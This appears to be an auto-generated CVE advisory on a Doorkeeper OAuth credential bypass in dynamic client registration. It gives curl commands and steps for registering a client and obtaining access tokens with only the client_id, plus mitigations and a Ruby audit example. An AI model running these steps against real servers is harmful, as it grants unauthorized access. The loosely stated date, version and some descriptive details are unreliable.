Intro to How This CVE Works:
The `DynamicClientRegistrationController#register` action in the Doorkeeper OAuth provider hard-codes `confidential: false` when dynamically registering new OAuth client applications. However, the server responds with a valid `client_secret` and advertises `token_endpoint_auth_methods_supported: ["client_secret_basic", "client_secret_post"]`, implying the client is confidential and must present a secret to authenticate.
This mismatch creates a credential bypass. Doorkeeper’s `Application.by_uid_and_secret` method considers a missing or blank client secret as valid for non-confidential (public) clients. Therefore, an attacker who knows only the publicly exposed `client_id` of a dynamically registered application can authenticate to the token endpoint without providing a secret.
Because the server falsely treats the client as confidential but never validates the secret, the attacker is granted a valid access token. The vulnerability is limited to projects that have explicitly enabled the optional dynamic client registration feature.
DailyCVE Form:
Platform: Doorkeeper
Version: <1.10.0
Vulnerability: Credential Bypass
Severity: Medium
Date: 2017-03-14 (approx.)
Prediction: Already patched (1.10.0)
What Undercode Say:
Enable dynamic client registration in the Doorkeeper initializer:

```ruby
Doorkeeper.configure do
  # ... other config ...
  enable_dynamic_client_registration true
end
```

Register a new client using the dynamic registration endpoint:

```bash
curl -X POST https://target.com/oauth/registration \
  -d "client_name=EvilApp" \
  -d "redirect_uris=https://evil.com/callback" \
  -d "scope=read write"
```

Observe that the response includes `client_id`, `client_secret`, and the misleading `token_endpoint_auth_methods_supported` list.

Exploit: use only the `client_id` to obtain an access token:

```bash
curl -X POST https://target.com/oauth/token \
  -d "grant_type=client_credentials" \
  -d "client_id=THE_CLIENT_ID_FROM_REGISTRATION"
```

The token endpoint issues an access token without verifying the `client_secret`.
Exploit:
- Identify the dynamic client registration endpoint on the target Doorkeeper provider.
- Register a new OAuth client (e.g., via `POST /oauth/registration`).
- Capture the returned `client_id` (the `client_secret` is ignored for the exploit).
- Request an access token using only the `client_id` in the `client_credentials` grant.
- The token endpoint fails to reject the missing secret because the application was incorrectly marked as non-confidential (`confidential: false`), despite the server's expectations.
- Use the issued access token to access protected resources as the registered client.
Protection:
- Immediate Upgrade: Update to Doorkeeper version 1.10.0 or later, which includes the patch for this vulnerability.
- Workaround for Existing Deployments: Manually update the `confidential` flag for all applications that were created via dynamic client registration. Set `confidential: true` to enforce secret validation.
- Disable Dynamic Registration: If not strictly needed, disable the dynamic client registration feature in the Doorkeeper initializer (`enable_dynamic_client_registration false`).
- Audit Existing Clients: Review all OAuth applications in the system to ensure they are correctly flagged as confidential or public based on their actual security properties.
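To make the root cause and the workaround concrete, here is an added Ruby example (not Doorkeeper's own code) that models the `by_uid_and_secret` lookup described in the intro, an audit that finds applications holding an issued secret while flagged `confidential: false`, and the `confidential: true` fix from the Protection list. The audit generalizes the page's workaround from "dynamically registered" to any client that was issued a secret; the `Application` struct, `sample_apps` data and all function names are constructed for this example.

```ruby
# Minimal stand-in for the persisted OAuth application record (constructed).
Application = Struct.new(:uid, :secret, :confidential, keyword_init: true)

# Constructed sample data standing in for the database.
def sample_apps
  [
    # Vulnerable state: created via dynamic registration, secret issued,
    # but persisted with confidential: false.
    Application.new(uid: "dyn-client-1", secret: "s3cr3t-issued", confidential: false),
    # Correctly flagged confidential client.
    Application.new(uid: "conf-client-1", secret: "other-secret", confidential: true),
  ]
end

# Model of the lookup described above: a missing or blank secret is accepted
# for non-confidential (public) clients, otherwise the secret must match.
def by_uid_and_secret(apps, uid, secret)
  app = apps.find { |a| a.uid == uid }
  return nil unless app
  return app if secret.to_s.empty? && !app.confidential
  # A real implementation should use a constant-time comparison here.
  return nil unless app.secret == secret
  app
end

# Audit: any application that was issued a secret (so the server advertises
# client_secret_basic / client_secret_post for it) but is flagged public will
# pass the lookup above with no secret at all.
def mismatched_clients(apps)
  apps.select { |a| !a.secret.to_s.empty? && !a.confidential }
end

# Workaround from the Protection list: flip such clients to confidential so
# secret validation is enforced. Returns the uids that were changed.
def enforce_confidential!(apps)
  mismatched_clients(apps).map { |a| a.confidential = true; a.uid }
end

if __FILE__ == $PROGRAM_NAME
  apps = sample_apps
  puts "bypass before fix: #{!by_uid_and_secret(apps, 'dyn-client-1', nil).nil?}"
  puts "fixed clients: #{enforce_confidential!(apps).inspect}"
  puts "bypass after fix:  #{!by_uid_and_secret(apps, 'dyn-client-1', nil).nil?}"
end
```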
Impact:
Successful exploitation allows an attacker to bypass client authentication entirely for dynamically registered applications. Using only the publicly known `client_id`, the attacker can obtain valid OAuth access tokens, impersonate the legitimate client, and access any resources or APIs that the client is authorized to use. This undermines the security of the OAuth authorization server and can lead to data breaches, privilege escalation, and lateral movement within the application ecosystem.
Sources:
Reported By: github.com

